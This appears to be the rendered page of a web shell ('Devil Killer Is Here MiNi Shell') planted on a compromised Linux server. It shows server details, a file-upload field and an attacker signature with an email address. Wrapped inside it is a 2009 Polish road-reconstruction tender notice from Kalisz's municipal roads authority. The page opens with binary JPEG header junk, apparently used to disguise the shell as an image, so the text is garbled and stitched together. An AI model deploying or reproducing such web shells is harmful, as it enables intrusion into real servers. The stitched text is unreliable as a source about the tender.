JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090804/264714-N-2009.html

<p class="kh_header"><b>Kalisz: Przebudowa ulicy Łomnickiej w Kaliszu</b><br>
<b>Numer ogłoszenia: 264714 - 2009; data zamieszczenia: 04.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Piskorzewska 17, 62-800 Kalisz, woj. wielkopolskie, tel. 062 5049709, faks 062 5049701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Łomnickiej w Kaliszu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac budowlanych obejmuje w szczególności:
4.1.1	Wykonanie projektu organizacji ruchu na czas prowadzonych robót
4.1.2	Wykonanie ciągu pieszo - jezdnego  wraz z regulacją wysokościową istniejących studzienek uzbrojenia podziemnego i uzupełnieniem kanalizacji deszczowej
4.1.3	Wykonanie oznakowania według projektu organizacji ruchu
4.1.4	 Obsługę geodezyjną wraz z geodezyjną inwentaryzacją powykonawczą (wersje w formie papierowej i elektronicznej w formacie DWG);

4.2. Szczegółowy zakres prac określa:
     1/ Projekt przebudowy nawierzchni ul. Łomnickiej - branża drogowa
       2/ Projekt budowlano - wykonawczy  branży  sanitarnej: Odwodnienie ulicy 
           Łomnickiej - przykanaliki deszczowe
           3/ Projekt stałej organizacji ruchu
           4/ Szczegółowa Specyfikacja Techniczna 
           5/ Kosztorys ofertowy

4.3. Przedmiot zamówienia należy wykonać zgodnie projektem  przebudowy 
nawierzchni ul. Łomnickiej - branża drogowa, projektem budowlano - 
  wykonawczym  branży  sanitarnej: Odwodnienie ulicy Łomnickiej - 
  przykanaliki deszczowe, projektem stałej organizacji ruchu, szczegółową
  specyfikacją techniczną.

4.4.Zawarte w załącznikach do niniejszej SIWZ nazwy materiałów podano jako  
       przykładowe, mające na celu doprecyzowanie przedmiotu zamówienia oraz 
       określające standard techniczny i jakościowy. 
       Materiały do wykonania zamówienia należy przyjmować w kategorii i jakości nie 
       niższej (równoważne) niż te wskazane w załącznikach do  niniejszej specyfikacji.

4.5. Zamawiający wymaga udzielenia gwarancji jakości na wykonany przedmiot 
       zamówienia  na okres nie krótszy niż 60 miesięcy licząc od terminu odbioru 
       końcowego.

4.6.	Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12.1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 3.000,00 zł
12.2.	Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art. 45 ust. 6 ustawy Pzp.
12.3.	Wadium w pieniądzu (PLN) nale ży wnieść przelewem na konto Zarządu Dróg Miejskich w Kaliszu.
Bank Millenium nr konta: 48 1160 2202 0000 0000 4218 2912 z dopiskiem Wadium - nr sprawy ZDM.341-39/I/09
12.4.	W przypadku wnoszenia wadium w innych formach niż pieniężna oryginał dowodu ich wniesienia należy włożyć do koperty z ofertą w osobnej koszulce (nie wpinać trwale do oferty).
12.5.	Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
12.6.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, poręczenia z ich treści musi jednoznacznie wynikać: nazwa zlecającego, beneficjenta gwarancji, gwaranta  wraz z adresami ich siedzib, określenie wierzytelności, która ma być zabezpieczona gwarancją: kwota gwarancji, termin ważności gwarancji, bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zmawiającego w przypadku zaistnienia przesłanek, o których mowa w art. 46 ust. 4a i 5 ustawy Pzp
12.7.	Kserokopie dowodu wpłaty wniesienia wadium np. dowód przelania pieniędzy na konto Zamawiającego czy kserokopie gwarancji bankowej, ubezpieczeniowej należy wpiąć trwale do oferty. Kserokopia ta winna być poświadczona za zgodność z oryginałem przez osobę/y uprawnioną/e            do reprezentowania Wykonawcy.
12.8.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami  w przypadku zaistnienia przesłanek o których mowa w art. 46 ust. 4a i 5 ustawy Pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 9.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
9.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
9.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności będącej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień,
9.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia potencjału technicznego i osób zdolnych do  wykonania zamówienia tj.:

       1/ wykażą, że dysponują kierownikiem budowy, który posiada uprawnienia 
           budowlane w   specjalności drogowej w zakresie niezbędnym do wykonania 
           przedmiotu oraz, że  należy (na dzień składania ofert) do właściwej izby 
          samorządu    zawodowego
      2/ złożą pisemne zobowiązanie innych podmiotów do udostępnienia osób 
          zdolnych do wykonania zamówienia, jeżeli  wykonawca nie dysponuje osobami 
          o których mowa w pkt-cie 9.1.2 ppkt. 1.
      3/ wykażą należyte wykonanie  w ciągu ostatnich 5 lat przed dniem wszczęcia   
niniejszego postępowania, a jeżeli okres prowadzenia działalności jest 
krótszy - w tym okresie,  co najmniej 3 zadań polegających na budowie lub przebudowie co najmniej 50 m ulicy o nawierzchni jezdni
i chodników z kostki brukowej betonowej.
9.1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1/ wykażą, że  posiadają (aktualne przynajmniej na dzień składania ofert)   
   ubezpieczenie od odpowiedzialności  cywilnej w zakresie prowadzonej 
   działalności  gospodarczej.
2/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia                 
    na podstawie art. 24  ust. 1 i 2 ustawy,
9.1.4.	udzielą gwarancji na przedmiot zamówienia minimum 60 miesięcy od dnia odbioru końcowego,
9.1.5.	zaakceptują termin realizacji określony w pkt. 5.1.  SIWZ,
9.1.6.	zaakceptują 21 dniowy termin płatności faktur.

9.2. Ocena spełniania warunków udziału w postępowaniu przez wykonawców, 
       określonych w pkt. 9.1  SIWZ, będzie dokonana w oparciu
       o kompletność i prawidłowość złożonych   wraz z ofertą oświadczeń                  
       i dokumentów, jakich żąda  Zamawiający i zostanie dokonana na  podstawie 
       treści tych dokumentów według   formuły spełnia/nie spełnia.

9.3.Każdy z Wykonawców ubiegający się wspólnie o udzielenie zamówienia 
      (składający ofertę wspólnie) musi samodzielnie spełniać warunki, o których mowa    
       w pkt. 9.1.1., 9.1.3.ppkt. 1/ i 2/  SIWZ. 
       Pozostałe  warunki i wymagania zawarte w pkt. 9.1.  mogą zostać spełnione 
       łącznie  przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 10.	Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy        w celu potwierdzenia spełnienia warunków udziału  w postępowaniu.
         Wraz z ofertą Wykonawca zobowiązany jest do złożenia n/w dokumentów: 

10.1.	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 i art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych - wzór stanowi załącznik  do SIWZ,
10.2.	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10.3.	dowód wniesienia wadium,
10.4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym             w art. 24 ust. 1 pkt. 4 - 8  ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10.5.	aktualną  informację z Krajowego Rejestru Karnego w zakresie określonym       w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10.6.	aktualne   zaświadczenia  właściwego naczelnika urzędu skarbowego  oraz właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego   Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca  nie  zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości  wykonania   decyzji właściwego  organu, wystawione nie wcześniej niż  3 miesiące   przed upływem terminu składania ofert,
10.7.	polisę, a w przypadku jej braku inny dokument potwierdzający, 
           że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
           prowadzonej działalności gospodarczej, 
10.8.	wykaz osób, spełniających warunki udziału w postępowaniu, o których 
      mowa w pkt 9.1.2 ppkt. 1/ - wzór stanowi załącznik nr  4 do SIWZ,
10.9.	dokumentów potwierdzających posiadanie przez osoby, o których mowa w 
pkt. 10.8 uprawnień budowlanych wymaganych przepisami ustawy Prawo budowlane oraz zaświadczenia potwierdzającego członkowstwo (przynajmniej na dzień składania ofert) ww. osób we właściwych izbach samorządu zawodowego, 
10.10.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa powyżej   wykonawca wykazał osoby, którymi będzie dysponował.
10.11.	wykaz robót budowlanych  spełniających warunki określone w pkt. 9.1.2.pkt.3 - wzór wykazu stanowi załącznik nr 3 do SIWZ (Doświadczenie zawodowe).
10.12.	Dokumenty potwierdzające, że wykonane roboty wyszczególnione w  załączniku nr 3 zostały wykonane należycie. Wykonane roboty wymienione w zał. nr 3 a nie potwierdzone ww. dokumentami nie będą uwzględniane przy ocenie ofert. 

Z treści ww. dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt. 10 SIWZ.


Dokumenty, o których mowa w pkt. 10.2, 10.4, 10.5, 10.6, 10.7, 10.9, 10.12 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę/y uprawnioną/e do reprezentowania Wykonawcy), pozostałe dokumenty należy złożyć w oryginale.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, do składania dokumentów, o których mowa wyżej stosuje się odpowiednio przepisy zawarte w § 2 Rozporządzenia Prezesa Rady Ministrów      z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od Wykonawcy (Dz. U. z 2006r. Nr 87 poz. 605z późn. zm.).

10.13.Zamawiający będzie żądać przedstawienia oryginału  lub notarialnie 
          potwierdzonej kopii dokumentu, w przypadku, gdy załączona do oferty kopia 
          zostanie uznana przez Zamawiającego za nieczytelna lub budzącą     
          wątpliwości,  co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Piskorzewska 17 62-800 Kalisz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2009 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Piskorzewska 17 62-800 Kalisz - SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com